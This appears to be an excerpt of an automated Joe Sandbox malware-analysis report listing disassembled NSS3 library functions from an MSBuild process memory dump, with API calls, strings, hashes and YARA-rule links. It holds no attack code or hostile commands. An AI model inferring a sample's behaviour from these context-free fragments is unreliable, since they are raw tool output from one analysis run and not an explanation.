Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
Instruction ID: b25f5207db29c9726e11d8f669a6a177dcf46a6bad597f7f21571e6b80ed3a2c
Opcode Fuzzy Hash: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
Instruction Fuzzy Hash: 9D91C4B1A083419FE700CF25DA44B5BBBE1EF84318F14852CE99997751FB31D964CB8A

Function 6C6D6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F

Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C60
PR_ExplodeTime.NSS3(00000000,6C681C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C94

Strings

gfff, xrefs: 6C6D6D30
gfff, xrefs: 6C6D6D66
gfff, xrefs: 6C6D6D9C
gfff, xrefs: 6C6D6CFD
gfff, xrefs: 6C6D6CF5

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
Instruction ID: 636e7b41d99490de196757aab33155310178815fc3b4ea942e8e096422151b56
Opcode Fuzzy Hash: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
Instruction Fuzzy Hash: E4516B72B016494FC70CCDADDC526DEB7DAABA4310F48C23AE442DB781DA38E906C751

Function 6C798D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798D47
PR_GetCurrentThread.NSS3 ref: 6C798D98

Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C798E7B
htons.WSOCK32(?), ref: 6C798EDB
PR_GetCurrentThread.NSS3 ref: 6C798F99
PR_GetCurrentThread.NSS3 ref: 6C79910A

Strings

%u.%u.%u.%u, xrefs: 6C798E74

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
Instruction ID: d5c9680b10ace95c6b8c0a62a9017d08c49428d7ae59c2576b6b5a7047adb388
Opcode Fuzzy Hash: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
Instruction Fuzzy Hash: 2002DC319452518FEB18CF19C6687AABBB3EF52344F29C26EC8964FB92C331D905C390

Function 6C73A480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C75C3A2,?,?,00000000,00000000), ref: 6C73A528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C73A6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A738

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C73A6CA
%s at line %d of [%.10s], xrefs: 6C73A6D9
database corruption, xrefs: 6C73A6D4

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
Instruction ID: d888b5200fc2a96d206570c1131afe0cfbd335db7a4a3661d0f0fa6ea04263d6
Opcode Fuzzy Hash: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
Instruction Fuzzy Hash: 0E91F7717083218FCB04CF68C585A5AB7E1BF58324F045A6DE89ACBB92E730EC44C792

Function 6C714540 Relevance: 12.2, APIs: 8, Instructions: 170COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C714571
memset.VCRUNTIME140(?,00000000,00000000), ref: 6C7145B1
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7145C2

Part of subcall function 6C7104C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
Part of subcall function 6C7104C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534

PR_Now.NSS3 ref: 6C714626

Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C714634
memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C7146C4
PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C7146E3
PR_SetError.NSS3(?,00000000), ref: 6C714722

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
String ID:
API String ID: 1183590942-0
Opcode ID: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
Instruction ID: 5848dce2a595252036f5b1c32662e8d06a17aa3afd3d0c2da11392af8aa8c185
Opcode Fuzzy Hash: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
Instruction Fuzzy Hash: C961E2B1E046049FEB10CF28D988B9AB7F5FF59308F584538E8459BA51E730F904CB80

Function 6C694420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C694444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694466

Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694494

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: e63905bc7034a3111e9803810afb70f122006538b5dff1115ee2e4c8dd2d0910
Instruction ID: b3294a65d3e6f980c5d237b8f7a5ed219d488e6d9f99d2736ec8ef6934612fee
Opcode Fuzzy Hash: e63905bc7034a3111e9803810afb70f122006538b5dff1115ee2e4c8dd2d0910
Instruction Fuzzy Hash: 5311E4B2D007159BD7208F24AC804B7B7F8FF99718B084B3EE89D92A00F371B5988795

Function 6C79CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79D086
PR_Malloc.NSS3(00000001), ref: 6C79D0B9
PR_Free.NSS3(?), ref: 6C79D138

Strings

>, xrefs: 6C79CF5B

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: ea488fe5314852cd50783faa8846a2480bf2a98aca011dc4127f50f563f31d15
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: EFD16C23B816460FFF14487CAEA13EA77A787623B4F584339D5229BBE5E619C843C305

Function 6C73AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37122d46c43e8374577f3ad5ee8d1298371e645733a5d44c88589ee82e683e62
Instruction ID: fa7644b24a9ce11f60a8e07518b9ad72f4cb376ef6c3037a44fe6e325310fa79
Opcode Fuzzy Hash: 37122d46c43e8374577f3ad5ee8d1298371e645733a5d44c88589ee82e683e62
Instruction Fuzzy Hash: DCF1D172F0156A8BDB05CF68CA453A9B7F5AB8A308F25823DC909D7751EB74B941CBC0

Function 6C7125B0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,6C6F5A85), ref: 6C712675
PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C712659

Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C389F
Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C38B3
Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C38F1
Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C390F
Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C3923
Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C3972

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712697
PK11_Encrypt.NSS3(?,?,?,?,00000000,6C6F5A85,?,6C6F5A85), ref: 6C712717

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
String ID:
API String ID: 3114817199-0
Opcode ID: 26718936eecacbd6f460a63b99ecb0da98cc54c6fc0641d2f62cb5257c88fd70
Instruction ID: ba3d520086b2df1c8a578243bf4077d286b390381a367129598abbc4f232bb2b
Opcode Fuzzy Hash: 26718936eecacbd6f460a63b99ecb0da98cc54c6fc0641d2f62cb5257c88fd70
Instruction Fuzzy Hash: 4E412671A0C380AAFB258E18CD89FDB73A8EFD2714F244528F95407E81EB71958587D3

Function 6C676410 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON

Download Yara Rule

APIs

bind.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676422
WSAGetLastError.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676432

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ErrorLastbind
String ID:
API String ID: 2328862993-0
Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction ID: c368a0586855b330d4604f8e343840e73080da34afaf29efb2379f93bd727cbc
Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
Instruction Fuzzy Hash: 31E01D35150108AFCB019F75ED0CC5A37A5AF08368B50C910F519C7771E631D4658750

Function 6C750C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
Instruction ID: 1155e50313a81232bf778eac16d6a35ef06a201ea62f1e66167e4371e39770e4
Opcode Fuzzy Hash: 66593048e9b2443dc1eddb47c64960d4b72d80873ca1b082925da55b36375258
Instruction Fuzzy Hash: 5F11CE797043458FDB04DF28C8C46AA77A2FF86368F14807DD8198B701DB31E816CBA0

Function 6C6C44C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
Instruction ID: 72375ea426853667cd315314d63c07f176fd7bece913ffb5c97e85a15aad83ea
Opcode Fuzzy Hash: 3fb9c988b55d71ba6f0cbe59a0089f07b2b53d2d2dbb0b3fadade0c5a200a733
Instruction Fuzzy Hash: 9011F776A002199F8B00CF99D8809EFBBF9EF8C664B554429ED19E7300D230ED10CBE1

Function 6C6C4440 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 094b462fde72d222a30301ef44baf6e6c8ea8bd1c2aa25aadee1b2952e670b7e
Instruction ID: ecba50193966b2d12fc1bd184a213b60ddacbf196749934d99e52191d51b1da5
Opcode Fuzzy Hash: 094b462fde72d222a30301ef44baf6e6c8ea8bd1c2aa25aadee1b2952e670b7e
Instruction Fuzzy Hash: 1F11B376A002199F9B00DF69C8849EFBBF9EF48214B16416AED18E7301E630ED118BE1

Function 6C750D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: ac72a4748540029156803c5f429a67eeca0b32ddbc7fac5553b4efec322962b9
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 1AE0923A202254A7DB148E09C555AA97359DF8161DFF4887DCC5D9FA01DB33F8138781

Function 6C6E4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C5B
PR_smprintf.NSS3(6C7BAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6E4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6D4F51,00000000), ref: 6C6E4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6E4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6E4DA2
free.MOZGLUE(?), ref: 6C6E4DB9
free.MOZGLUE(00000000), ref: 6C6E4DCF

Strings

timeout, xrefs: 6C6E4C91
slotFlags, xrefs: 6C6E4D34
rust, xrefs: 6C6E4D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C6E4D9D
rootFlags, xrefs: 6C6E4D47
0x%08lx=[%s %s], xrefs: 6C6E4D80
ootT, xrefs: 6C6E4D1A
%s,%s, xrefs: 6C6E4C4B
every, xrefs: 6C6E4CA1
any, xrefs: 6C6E4C96

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: f77e206c6a8e50d3ce21e69af11e0e4ed98c6da3b6ce5b7d8855eeeea9a4cfb8
